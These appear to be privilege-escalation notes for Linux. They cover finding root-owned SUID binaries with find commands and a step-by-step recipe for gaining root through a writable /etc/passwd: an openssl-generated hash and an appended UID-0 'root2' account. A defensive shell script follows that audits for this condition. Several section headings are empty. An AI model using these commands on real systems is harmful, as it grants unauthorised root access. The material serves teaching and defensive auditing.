Enumerating Attack Vectors

Helpful Tools


Processes and Jobs

Kernel and OS

Finding Interesting Files and Directories

Enumerating SUID binaries

SUID is a special file permission on executable files that lets other users run the file with the effective permissions of the file's owner. Instead of the normal x that denotes execute permission, you will see an s (indicating SUID) in the owner's permission bits.

Obviously, for a quick win, you want to find SUID binaries owned by the root user.

HackTricks has a page with more information on this topic.

You can find SUID binaries in many ways; the following are some example commands:

  • find / -perm -4000 2>/dev/null

  • find / -perm /4000 2>/dev/null

  • find / -perm /u+s 2>/dev/null

  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Other Tricks - Miscellaneous

This section contains some specific things which could help you find unusual vectors to escalate your privileges.


Writeable passwd file

Always check whether you have write permission on the /etc/passwd file.

If that's the case, you can effectively set an arbitrary password for any account.

To check, use ls -la /etc/passwd.

Supposing you have write permission, you can generate a password hash and use it to log in as root as follows:

  1. Generate the password hash: openssl passwd w00t (output: Fdzt.eqJQ4s0g)

  2. Append a new entry carrying that hash to the passwd file: echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

  3. Now you can log in as root with su root2, entering w00t as the password.
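As an added defensive check (not part of the original notes), the following POSIX shell script flags the three conditions the trick above produces: a group- or world-writable passwd file, a second UID-0 account, and a password hash stored directly in field 2 instead of an x pointing at /etc/shadow. It assumes GNU or busybox `stat -c` and audits a constructed sample passwd file before the live one; the root2 line in the sample is the entry from step 2.

```shell
#!/bin/sh
# Added audit (not from the original notes): flag the conditions the
# writeable-passwd trick creates. Assumes GNU/busybox `stat -c`.

# Constructed sample /etc/passwd; the root2 line is the one the trick appends.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin'

# Write the sample to a temp file, deliberately world-writable; print its path.
write_sample() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
    chmod 666 "$tmp"
    printf '%s' "$tmp"
}

# Audit a passwd-format file (default /etc/passwd). Prints one finding per
# line and returns 1 if anything was flagged, 0 if the file looks clean.
audit_passwd() {
    f="${1:-/etc/passwd}"
    rc=0
    # Group- or world-writable: any such user can append an account.
    mode=$(stat -c '%a' "$f")
    case "$mode" in
        *[2367] | *[2367]?) echo "WRITABLE: $f has mode $mode"; rc=1 ;;
    esac
    # Any second UID-0 account is a root-equivalent backdoor.
    extra=$(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$f")
    if [ -n "$extra" ]; then echo "EXTRA_UID0: $extra"; rc=1; fi
    # Field 2 should be "x" (hash lives in /etc/shadow) or a lock marker;
    # a literal hash here means the account was added by hand, as in step 2.
    hashed=$(awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" { print $1 }' "$f")
    if [ -n "$hashed" ]; then echo "HASH_IN_PASSWD: $hashed"; rc=1; fi
    return $rc
}

# When run directly: audit the constructed sample, then the live file.
sample=$(write_sample)
audit_passwd "$sample" || echo "(sample flagged, as intended)"
rm -f "$sample"
if [ -r /etc/passwd ]; then
    audit_passwd /etc/passwd && echo "no findings in /etc/passwd"
fi
```

On a hardened host the only legitimate UID-0 entry is root and every field 2 is x; anything else is worth a look in /etc/shadow and in the file's change history.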
